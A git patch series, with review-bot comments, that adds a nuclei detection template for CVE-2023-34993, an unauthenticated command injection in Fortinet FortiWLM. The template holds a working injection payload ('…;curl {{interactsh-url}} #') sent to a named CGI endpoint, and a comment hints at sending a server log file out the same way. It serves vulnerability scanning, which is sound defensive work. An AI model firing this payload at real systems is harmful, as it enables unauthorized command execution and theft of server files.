From aad69a8d8d2d374dbf7cdc904299b869dddf8a2e Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Thu, 14 Mar 2024 21:28:41 +0700
Subject: [PATCH 1/5] feat(http): add CVE-2023-34993

Signed-off-by: Dwi Siswanto
---
 http/cves/2023/CVE-2023-34993.yaml | 35 ++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-34993.yaml

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
new file mode 100644
index 0000000000..05cbed11a5
--- /dev/null
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -0,0 +1,35 @@
+id: CVE-2023-34993
+
+info:
+  name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
+  author: dwisiswant0
+  severity: critical
+  description: |
+    A improper neutralization of special elements used in an os command ('os
+    command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
+    8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
+    Successful exploitation of this vulnerability could allow an attacker to
+    bypass authentication and gain unauthorized access to the affected system.
+  remediation: |
+    For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
+    For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
+  reference:
+    - https://fortiguard.com/psirt/FG-IR-23-140
+  metadata:
+    max-request: 1
+    vendor: fortinet
+    product: fortiwlm
+  tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
+
+variables:
+  progressfile: '/tmp/{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

From 71679c45e4fd0ff0dd156f1513c0bc87a9420b2b Mon Sep 17 00:00:00 2001
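Review bot: The `info` block carries `metadata` but no `classification` stanza, which the CVE templates in this repository use to pin the identifiers a consumer filters on; add `classification:` with `cve-id: CVE-2023-34993`, `cwe-id: CWE-78` (the description is the CWE-78 wording) and the `cvss-score`/`cvss-metrics` values taken from the FG-IR-23-140 advisory rather than typed from memory. The inline comment trailing the `progressfile` value (`# -F "file=..."`) records nothing a reader can act on and is carried through PATCH 4/5 unchanged; either state what it is for or drop it. The `description` is pasted verbatim with its grammar ('A improper', no sentence break before 'Successful'), and since that text surfaces in scan reports it is worth tidying.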
From: Dwi Siswanto
Date: Thu, 14 Mar 2024 21:31:18 +0700
Subject: [PATCH 2/5] docs(http): add missing ref for CVE-2023-34993

Signed-off-by: Dwi Siswanto
---
 http/cves/2023/CVE-2023-34993.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index 05cbed11a5..14c31acf20 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -15,6 +15,7 @@ info:
     For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
   reference:
     - https://fortiguard.com/psirt/FG-IR-23-140
+    - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
   metadata:
     max-request: 1
     vendor: fortinet

From d4784b936de5a14ad5b528742d84d6d05c5c70e4 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Thu, 21 Mar 2024 08:35:45 +0700
Subject: [PATCH 3/5] feat(http): add word matcher for CVE-2023-34993

Co-authored-by: DhiyaneshGeek
Signed-off-by: Dwi Siswanto
---
 http/cves/2023/CVE-2023-34993.yaml | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index 14c31acf20..d1d99c9c10 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -33,4 +33,9 @@ http:
       - type: word
         part: interactsh_protocol
         words:
-          - "dns"
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"

From 428de33322d632b633c349c633f709094e0c5b3a Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Thu, 28 Mar 2024 19:10:50 +0700
Subject: [PATCH 4/5] refactor(http): remove `/tmp` path in `progressfile` var

assumes that the `$systemTempDir` val is `/tmp`

Signed-off-by: Dwi Siswanto
---
 http/cves/2023/CVE-2023-34993.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index d1d99c9c10..86a2344a22 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
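Review bot: With a second matcher added and no `matchers-condition` set, nuclei evaluates the matchers with its default `or`, so any HTTP interaction on the interactsh host is reported even when the `User-Agent: curl` word is absent from the callback; since both signals come from the same request and the second is what separates the injected command from unrelated traffic, add `matchers-condition: and` beside `matchers:` so both must hold. The `matchers:` key itself sits just above this hunk's first context line, outside the hunk, as does the rest of the `http` request block.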
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -23,7 +23,7 @@ info:
   tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
 
 variables:
-  progressfile: '/tmp/{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
+  progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
 
 http:
   - method: GET

From 8e29306c16451f7edeb2b89164fc639b21153152 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Thu, 28 Mar 2024 19:12:22 +0700
Subject: [PATCH 5/5] feat(http): add shodan query metadata for CVE-2023-34993

Signed-off-by: Dwi Siswanto
---
 http/cves/2023/CVE-2023-34993.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index 86a2344a22..7f2a3ee849 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -20,6 +20,7 @@ info:
     max-request: 1
     vendor: fortinet
     product: fortiwlm
+    shodan-query: http.title:"FortiWLM"
   tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
 
 variables:
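Review bot: The reason the `/tmp/` prefix was dropped is recorded only in the commit message (the server-side `$systemTempDir` is assumed to supply the directory), so the next reader of the `variables` block sees a bare `{{rand_base(5)}}` and may reinstate the path; keep the rationale with the value by adding a comment above the line, `# no directory prefix: the server is expected to prepend its own temp dir`. The `variables` mapping is fully inside the hunk, but the `http` block that consumes it continues past the hunk's last context line.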